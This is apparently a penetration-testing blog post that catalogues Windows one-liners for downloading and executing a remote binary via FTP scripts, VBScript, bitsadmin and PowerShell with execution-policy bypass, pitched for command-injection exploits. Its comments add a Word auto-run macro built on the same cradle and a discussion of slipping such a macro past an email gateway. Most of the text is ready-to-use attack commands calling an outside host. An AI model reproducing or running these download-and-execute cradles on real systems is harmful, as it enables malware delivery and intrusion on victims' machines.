Ways to Download and Execute code via the Commandline

In this post I am just highlighting some of the ways that I know of where we can download and execute code via the commandline which could be used in command injection vulnerabilities or exploiting buffer overflows using the classic ret-to-libc method. Most of you would most probably know these methods but I thought I’d post it anyway for my own reference.

FTP method
FTP can be used to download a binary and then get executed with the start command. The downside to this method is that we’ll need to have a FTP server hosting the binary file. Nevertheless the command string length can be reasonably small.

Here the ftp commands which are first echoed to create a script, then run the script by ftp.exe to download the binary and finally executing the binary.

get /messbox.exe
cmd.exe /c "@echo open>script.txt&@echo binary>>script.txt&
@echo get /messbox.exe>>script.txt&@echo quit>>script.txt&@ftp -s:scrip
t.txt -v -A&@start messbox.exe"

We can make the command string smaller by using o for open and b for binary. Also our script file can also be represented as a single character.

WSH method
Windows Scripting Host can also be used to download and execute code. For this we again need to echo out the scripting code to a file and then run our script by cscript.exe.

strFileURL = "http://www.greyhathacker.net/tools/messbox.exe"
strHDLocation = "mess.exe"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0   
objADOStream.SaveToFile strHDLocation
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
Set objShell = CreateObject("WScript.Shell")

Below is the code that is chained up and then using cscript.exe to run our script.

cmd.exe /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>poc.vbs
&@echo objXMLHTTP.open "GET","http://www.greyhathacker.net/tools/messbo
x.exe",false>>poc.vbs&@echo objXMLHTTP.send()>>poc.vbs&@echo If objXMLH
TTP.Status=200 Then>>poc.vbs&@echo Set objADOStream=CreateObject("ADODB
.Stream")>>poc.vbs&@echo objADOStream.Open>>poc.vbs&@echo objADOStream.
Type=1 >>poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>poc.
vbs&@echo objADOStream.Position=0 >>poc.vbs&@echo objADOStream.SaveToFi
le "mess.exe">>poc.vbs&@echo objADOStream.Close>>poc.vbs&@echo Set objA
DOStream=Nothing>>poc.vbs&@echo End if>>poc.vbs&@echo Set objXMLHTTP=No
thing>>poc.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>poc.vb
s&@echo objShell.Exec("mess.exe")>>poc.vbs&cscript.exe poc.vbs"

BITSadmin method
Windows 7 comes with a console tool called bitsadmin.exe which can be used to download and upload files. The cool thing about bitsadmin is that it suspends the transfer if a network connection is lost. After reconnection the transfer continues where it left off and executes our code.

cmd.exe /c "bitsadmin /transfer myjob /download /priority high http://w
ww.greyhathacker.net/tools/messbox.exe c:\mess.exe&start mess.exe"

PowerShell method
Powershell is a scripting language which comes as standard in Windows 7. Below is a script which downloads and executes mess.exe.

$down = New-Object System.Net.WebClient
$url  = 'http://www.greyhathacker.net/tools/messbox.exe';
$file = 'mess.exe';
$exec = New-Object -com shell.application

We can echo this script to a file and then run the script using Powershell with the “bypass” parameter as by default the Powershell policy is set to “restricted”.

powershell.exe -executionpolicy bypass -file poc.ps1

Another elegant way to run our code without any scripts is by chaining our code in one line as shown below

PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.g
reyhathacker.net/tools/messbox.exe','mess.exe');Start-Process 'mess.exe'
PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.g
reyhathacker.net/tools/messbox.exe','mess.exe');(New-Object -com Shell.




  1. Hey man, I find that I keep browsing your site hehe. For the BITSadmin method you need to specify the full path the mess.exe => c:\mess.exe otherwise it won’t execute on my system. Great stuff as usual!!

  2. any way to get these to work in a java script?
    something like this “Runtime.getRuntime().exec(“PowerShell (New-Object System.Net.WebClient).DownloadFile(‘http://www.rarlab.com/rar/wrar420cro.exe’,’mess.exe’);Start-Process ‘mess.exe'”);

  3. Elo!

    I try it run word macro with this:

    Sub Auto_Open()
    Dim x
    x = Shell(“POWERSHELL.EXE ” & “(New-Object System.Net.WebClient).DownloadFile(‘http://www.greyhathacker.net/tools/messbox.exe’,’mess.exe’);Start-Process ‘mess.exe'”)

    End Sub

    but, when i open word document and accept macro nothing happend. Only, when i click manually run macro in view panel macro runing ok and message box are show..

    what i do wrong?

  4. I can’t say but I don’t think you’re doing anything wrong. I haven’t played with macros for years but I think I can recall Microsoft removing the ability to autorun macros. If you create say a button in your document and then press the button is should work but I guess that defeats the object of running automatically.

  5. Incredibly useful for what i’ve been pentesting this weekend, trying to backdoor a macro and get it through an email gateway. Can get the macro through, PS gets caught, but i reckon a chained BITS command would work, but can I get BITS proxy settings right, can i hell!

  6. I tested it a bit but couldn’t get it to work in one command line with its /setproxysettings argument. You might need to create a job first and then /transfer to download the file, i.e. need to run bitsadmin twice.

Leave a Reply

Your email address will not be published. Required fields are marked *